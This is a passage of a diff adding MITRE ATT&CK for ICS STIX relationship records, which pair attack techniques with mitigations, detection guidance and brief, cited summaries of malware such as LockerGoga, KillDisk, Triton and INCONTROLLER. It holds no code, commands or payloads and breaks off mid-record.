"attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b9632b4d-43c3-4bfa-88e0-629245acb8eb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.091Z", + "relationship_type": "mitigates", + "description": "Ensure users and user groups have appropriate permissions for their roles through Identity and Access Management (IAM) controls to prevent misuse. Implement user accounts for each individual that may access the repositories for role enforcement and non-repudiation of actions.\n", + "source_ref": "course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--7a55fc66-0d5c-4ef6-af28-d4a4bb84381d", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Hydro", + "description": "Hydro Kevin Beaumont How Lockergoga took down Hydro ransomware used in targeted attacks aimed at big business Retrieved. 2019/10/16 Retrieved. 2019/10/16 ", + "url": "https://www.hydro.com/en/media/on-the-agenda/cyber-attack/" + }, + { + "source_name": "Kevin Beaumont", + "description": "Kevin Beaumont How Lockergoga took down Hydro ransomware used in targeted attacks aimed at big business Retrieved. 2019/10/16 ", + "url": "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:56:48.612Z", + "description": "Some of Norsk Hydro's production systems were impacted by a [LockerGoga](https://attack.mitre.org/software/S0372) infection. This resulted in a loss of view which forced the company to switch to manual operations. (Citation: Kevin Beaumont) (Citation: Hydro)", + "relationship_type": "uses", + "source_ref": "malware--5af7a825-2d9f-400d-931a-e00eb9e27f48", + "target_ref": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--09977105-562f-4f45-a151-27a11a18031e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.164Z", + "relationship_type": "mitigates", + "description": "The encryption of firmware should be considered to prevent adversaries from identifying possible vulnerabilities within the firmware.\n", + "source_ref": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--66d637a0-4874-4b12-bd3a-b408acb06d26", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:53:54.118Z", + "description": "Monitor for executed processes (such as ipconfig/ifconfig and arp) with arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses. Also monitor for executed processes that may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b343e131-e448-46c6-815b-b86e4bd6d638", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Threat Intelligence August 2019", + "description": "Dragos Threat Intelligence 2019, August Global Oil and Gas Cyber Threat Perspective Retrieved. 2020/01/03 ", + "url": "https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:06:51.429Z", + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) targeted several ICS vendors and manufacturers. (Citation: Dragos Threat Intelligence August 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c473686a-2452-4ee6-bf1d-54bf3e575d95", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:42:42.363Z", + "description": "Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1f6b87f3-6749-4caa-98d3-265ebbe0ecbe", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:56:06.055Z", + "description": "Monitor for alike file hashes or characteristics (ex: filename) that are created on multiple hosts. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1fd4cf4e-a26c-4fe5-a7fd-f49b8aea8437", + "created": "2021-04-12T18:49:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Tom Fakterman August 2019", + "description": "Tom Fakterman 2019, August 05 Sodinokibi: The Crown Prince of Ransomware Retrieved. 2021/04/12 ", + "url": "https://www.cybereason.com/blog/the-sodinokibi-ransomware-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:03:36.379Z", + "description": "[REvil](https://attack.mitre.org/software/S0496) initially executes when the user clicks on a JavaScript file included in the phishing emails .zip attachment. (Citation: Tom Fakterman August 2019)", + "relationship_type": "uses", + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--49d941a6-4da2-4516-92d0-1bc64554b2f2", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:37:44.970Z", + "description": "Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible, to determine their actions and intent.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd", + "target_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--81117328-e2bb-431c-a1ca-6ba7e6816637", + "created": "2022-09-26T16:25:38.511Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:25:38.511Z", + "description": "Consult asset management systems to understand expected program versions.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--531e0589-0dad-444d-aca4-6198ba5d9fcd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.208Z", + "relationship_type": "mitigates", + "description": "Segment operational assets and their management devices based on their functional role within the process. Enabling more strict isolation to more critical control and operational information within the control environment. (Citation: Karen Scarfone; Paul Hoffman September 2009) (Citation: Keith Stouffer May 2015) (Citation: Department of Homeland Security September 2016) (Citation: Dwight Anderson 2014) \n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "external_references": [ + { + "source_name": "Karen Scarfone; Paul Hoffman September 2009", + "description": "Karen Scarfone; Paul Hoffman 2009, September Guidelines on Firewalls and Firewall Policy Retrieved. 2020/09/25 ", + "url": "https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-41r1.pdf" + }, + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + }, + { + "source_name": "Dwight Anderson 2014", + "description": "Dwight Anderson 2014 Protect Critical Infrastructure Systems With Whitelisting Retrieved. 2020/09/25 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/protect-critical-infrastructure-systems-whitelisting-35312" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--b0fe8a56-cb76-4d79-9ba9-9358ef08aa08", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:59:13.486Z", + "description": "Monitor for device alarms produced when parameters are changed, although not all devices will produce such alarms.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8f90363e-2825-4178-807f-9268a28760fa", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.195Z", + "relationship_type": "mitigates", + "description": "Enforce system policies or physical restrictions to limit hardware such as USB devices on critical assets.\n", + "source_ref": "course-of-action--9e3adcad-0b8f-4ecc-a2f3-06f607f53bf0", + "target_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--06782c99-93de-4db9-9c30-6f96aef894d2", + "created": "2023-03-30T19:06:49.501Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:06:49.501Z", + "description": "Monitor for newly executed processes that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e8af0b34-4a67-4966-a34a-c4d1b346ea15", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.104Z", + "relationship_type": "mitigates", + "description": "All devices or systems changes, including all administrative functions, should require authentication. Consider using access management technologies to enforce authorization on all management interface access attempts, especially when the device does not inherently provide strong authentication and authorization functions.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--b252a076-6d4e-49f5-95ac-16264ef05b1d", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov", + "description": "Anton Cherepanov BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry Retrieved. 2019/10/29 ", + "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:55:06.661Z", + "description": "[KillDisk](https://attack.mitre.org/software/S0607) is able to delete system files to make the system unbootable and targets 35 different types of files for deletion. (Citation: Anton Cherepanov)", + "relationship_type": "uses", + "source_ref": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f703f8b2-b6b9-41f3-a551-6bb3647c45cc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.147Z", + "relationship_type": "mitigates", + "description": "Use file system access controls to protect system and application folders.\n", + "source_ref": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--49d38b21-5ce5-48d9-a356-639fc6c7a53d", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:27:26.605Z", + "description": "All field controllers should require users to authenticate for all remote or local management sessions. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cea2f5a7-4871-4c62-a2d5-5a76aadf2d1a", + "created": "2022-09-26T14:37:45.140Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:37:45.140Z", + "description": "Monitor for anomalous or unexpected commands that may result in changes to the process operation (e.g., discrete write, logic and device configuration, mode changes) observable via asset application logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--44c857cf-7a4e-405a-87ca-7f6d79000589", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T21:22:38.490Z", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of gold-copy back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9db1ecfe-72eb-42da-a09e-746663a53854", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "MDudek-ICS", + "description": "MDudek-ICS TRISIS-TRITON-HATMAN Retrieved. 2019/11/03 ", + "url": "https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN/tree/master/decompiled_code/library" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-29T20:46:03.389Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) contains a file named TS_cnames.py which contains default definitions for program state (TS_progstate). Program state is referenced in TsHi.py.(Citation: MDudek-ICS)\n\n[Triton](https://attack.mitre.org/software/S1009) contains a file named TS_cnames.py which contains default definitions for key state (TS_keystate). Key state is referenced in TsHi.py.(Citation: MDudek-ICS)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4cce6bf1-1aa9-483d-a733-d6e52e091419", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Atlassian Confluence Logging", + "description": "Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018.", + "url": "https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html" + }, + { + "source_name": "Microsoft SharePoint Logging", + "description": "Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018.", + "url": "https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2" + }, + { + "source_name": "Sharepoint Sharing Events", + "description": "Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October 8, 2021.", + "url": "https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:13:08.567Z", + "description": "Monitor for newly constructed logon behavior within Microsoft's SharePoint can be configured to report access to certain pages and documents.(Citation: Microsoft SharePoint Logging) Sharepoint audit logging can also be configured to report when a user shares a resource.(Citation: Sharepoint Sharing Events) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter.(Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a731ad54-0c3c-47bb-9559-d99950782beb", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T19:22:39.784Z", + "description": "Monitor interactions with network shares, such as reads or file transfers, using remote services such as Server Message Block (SMB). For added context on adversary procedures and background see [Remote Services](https://attack.mitre.org/techniques/T1021) and applicable sub-techniques.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9f07c92a-78a0-438a-8cb2-01e2bddaeb42", + "created": "2021-01-04T21:30:14.830Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET Industroyer", + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + }, + { + "source_name": "Dragos Crashoverride 2017", + "description": "Dragos Inc.. (2017, June 13). CRASHOVERRIDE Analysis of the Threat to Electric Grid Operations. Retrieved December 18, 2020.", + "url": "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + }, + { + "source_name": "Secureworks IRON VIKING", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:46:32.756Z", + "description": "(Citation: Dragos Crashoverride 2018)(Citation: Dragos Crashoverride 2017)(Citation: ESET Industroyer)(Citation: Secureworks IRON VIKING)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2d07e32d-e9cd-4b19-86ad-4573824d6919", + "created": "2022-09-27T16:30:41.482Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T16:30:41.482Z", + "description": "Monitor device management protocols for functions that modify programs such as online edit and program append events.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cba8313b-c338-45f7-88ef-a514094882ac", + "created": "2022-09-28T20:28:39.348Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.446Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) has the ability to exploit a vulnerable Asrock driver (AsrDrv103.sys) using CVE-2020-15368 to load its own unsigned driver on the system.(Citation: Wylie-22)", + "relationship_type": "uses", + "source_ref": 